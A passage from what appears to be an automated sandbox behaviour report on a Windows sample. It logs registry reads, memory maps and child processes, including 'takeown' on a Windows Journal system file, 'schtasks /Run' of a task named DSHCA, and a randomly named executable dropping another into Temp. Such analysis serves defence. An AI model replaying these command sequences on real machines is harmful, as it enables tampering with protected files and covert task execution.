| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 82 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 61 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 18 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 56 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 88, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0x41c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0xed4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0xd98, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
6 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = PATHEXT, result_out = . |
|
1 | |
| Get Environment String | name = FN, result_out = "Genko_2.jtp" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "Genko_2.jtp" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #110: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #110 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\en-US\Journal.exe.mui" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:20, Reason: Child Process |
| Unmonitor | End Time: 00:02:31, Reason: Self Terminated |
| Monitor Duration | 00:00:11 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb20 |
| Parent PID | 0x150 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E5C
0x
15C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000ef0000 | 0x00ef0000 | 0x00f0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ef0000 | 0x00ef0000 | 0x00efffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000f00000 | 0x00f00000 | 0x00f03fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f10000 | 0x00f10000 | 0x00f11fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x00f10000 | 0x00f14fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000f20000 | 0x00f20000 | 0x00f33fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000f40000 | 0x00f40000 | 0x00f7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f80000 | 0x00f80000 | 0x00fbffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000fc0000 | 0x00fc0000 | 0x00fc3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000fd0000 | 0x00fd0000 | 0x00fd0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000fe0000 | 0x00fe0000 | 0x00fe1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00ff0000 | 0x010adfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000010b0000 | 0x010b0000 | 0x010bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000010c0000 | 0x010c0000 | 0x010fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001100000 | 0x01100000 | 0x0113ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x01140000 | 0x01169fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001140000 | 0x01140000 | 0x01140fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001150000 | 0x01150000 | 0x01150fff | Private Memory | rw |
|
|
|
- |
| takeown.exe | 0x01220000 | 0x0122ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001230000 | 0x01230000 | 0x0522ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000005230000 | 0x05230000 | 0x054fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005230000 | 0x05230000 | 0x053fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005230000 | 0x05230000 | 0x053b7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000053f0000 | 0x053f0000 | 0x053fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005400000 | 0x05400000 | 0x054fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005500000 | 0x05500000 | 0x05680fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005690000 | 0x05690000 | 0x06a8ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x06a90000 | 0x06dc6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007fb70000 | 0x7fb70000 | 0x7fc6ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007fc70000 | 0x7fc70000 | 0x7fc92fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007fc95000 | 0x7fc95000 | 0x7fc95fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fc97000 | 0x7fc97000 | 0x7fc99fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fc9a000 | 0x7fc9a000 | 0x7fc9afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fc9d000 | 0x7fc9d000 | 0x7fc9ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #111: schtasks.exe
10
0
| Information | Value |
|---|---|
| ID | #111 |
| File Name | c:\windows\syswow64\schtasks.exe |
| Command Line | schtasks /Run /I /tn DSHCA |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:20, Reason: Child Process |
| Unmonitor | End Time: 00:02:33, Reason: Self Terminated |
| Monitor Duration | 00:00:13 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x504 |
| Parent PID | 0x81c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
9EC
0x
888
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000780000 | 0x00780000 | 0x0079ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000780000 | 0x00780000 | 0x0078ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000790000 | 0x00790000 | 0x00793fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007a0000 | 0x007a0000 | 0x007a1fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007a0000 | 0x007a0000 | 0x007a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007b0000 | 0x007b0000 | 0x007c3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000007d0000 | 0x007d0000 | 0x0080ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000810000 | 0x00810000 | 0x0084ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000850000 | 0x00850000 | 0x00853fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000860000 | 0x00860000 | 0x00860fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000870000 | 0x00870000 | 0x00871fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000880000 | 0x00880000 | 0x008bffff | Private Memory | rw |
|
|
|
- |
| schtasks.exe.mui | 0x008c0000 | 0x008d2fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000008e0000 | 0x008e0000 | 0x008effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008f0000 | 0x008f0000 | 0x00b1ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x008f0000 | 0x009adfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000009b0000 | 0x009b0000 | 0x009effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000009f0000 | 0x009f0000 | 0x009f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000a20000 | 0x00a20000 | 0x00b1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b20000 | 0x00b20000 | 0x00bcffff | Private Memory | rw |
|
|
|
- |
| ole32.dll | 0x00bd0000 | 0x00cb8fff | Memory Mapped File | r |
|
|
|
- |
| schtasks.exe | 0x00df0000 | 0x00e21fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000e30000 | 0x00e30000 | 0x04e2ffff | Pagefile Backed Memory | - |
|
|
|
- |
| sortdefault.nls | 0x04e30000 | 0x05166fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| taskschd.dll | 0x74230000 | 0x742bbfff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x76fe0000 | 0x77061fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x770d0000 | 0x77161fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e760000 | 0x7e760000 | 0x7e85ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e860000 | 0x7e860000 | 0x7e882fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e888000 | 0x7e888000 | 0x7e88afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e88b000 | 0x7e88b000 | 0x7e88dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e88e000 | 0x7e88e000 | 0x7e88efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e88f000 | 0x7e88f000 | 0x7e88ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
COM (3)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | TaskScheduler | ITaskService | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = Connect |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = GetFolder, new_interface = ITaskFolder |
|
1 |
File (6)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 54 |
|
1 |
Module (3)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\schtasks.exe | base_address = 0xdf0000 |
|
1 | |
| Get Filename | - | process_name = c:\windows\syswow64\schtasks.exe, file_name_orig = C:\Windows\SysWOW64\schtasks.exe, size = 260 |
|
2 |
Process #112: qry2vco2.exe
175
0
| Information | Value |
|---|---|
| ID | #112 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula "Seyes.jtp" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:21, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Self Terminated |
| Monitor Duration | 00:00:08 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb68 |
| Parent PID | 0xf6c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A60
0x
CF4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00210000 | 0x00239fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00210fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00290000 | 0x0034dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x005fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x006fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000700000 | 0x00700000 | 0x0085ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000860000 | 0x00860000 | 0x009e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009f0000 | 0x009f0000 | 0x00b70fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000b80000 | 0x00b80000 | 0x01f7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x740d0000 | 0x74161fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
